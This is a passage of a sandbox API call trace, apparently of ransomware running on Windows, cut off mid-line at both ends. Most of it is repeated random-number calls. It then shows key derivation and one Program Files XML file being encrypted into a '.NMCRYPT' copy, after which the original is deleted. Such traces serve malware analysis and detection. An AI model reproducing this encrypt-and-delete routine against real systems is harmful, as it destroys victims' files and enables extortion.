returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.632] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.633] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.633] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0155.633] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0155.633] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0155.633] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0155.634] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad3b8) returned 1 [0155.634] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0155.634] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0155.634] wcslen (_String="\\\\?\\") returned 0x4 [0155.634] CryptDuplicateKey (in: hKey=0x9ad3b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad2f8) returned 1 [0155.634] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0155.634] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0155.634] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=903) returned 1 [0155.634] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0155.635] ReadFile (in: hFile=0x1624, lpBuffer=0x607d60, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0155.636] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0155.636] GetLastError () returned 0x0 [0155.636] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.456] ReadFile (in: hFile=0x1624, lpBuffer=0x607d60, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.456] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.456] GetLastError () returned 0x0 [0156.456] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.456] ReadFile (in: hFile=0x1624, lpBuffer=0x607d60, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.456] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.456] GetLastError () returned 0x0 [0156.456] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.456] ReadFile (in: hFile=0x1624, lpBuffer=0x607d60, nNumberOfBytesToRead=0x87, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesRead=0x2d7dc80*=0x87, lpOverlapped=0x0) returned 1 [0156.456] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x87, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x90) returned 1 [0156.456] GetLastError () returned 0x0 [0156.456] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x90, lpOverlapped=0x0) returned 1 [0156.456] ReadFile (in: hFile=0x1624, lpBuffer=0x607d60, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0156.456] WriteFile (in: hFile=0x588, lpBuffer=0x607d60*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0156.457] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml")) returned 0x20 [0156.457] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml", dwFileAttributes=0x20) returned 0 [0156.457] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 1 [0156.457] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml")) returned 0 [0156.457] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" [0156.457] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert") returned 1 [0156.457] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\.xXD658.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\.xxd658.tmp")) returned 0xd658 [0156.459] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\.xXD658.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\.xxd658.tmp"), dwFlags=0x1) returned 0 [0156.459] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\.xXD658.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\.xxd658.tmp")) returned 1 [0156.459] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0156.459] wcslen (_String="OK") returned 0x2 [0156.459] fflush (in: _File=0x77ac1228 | out: 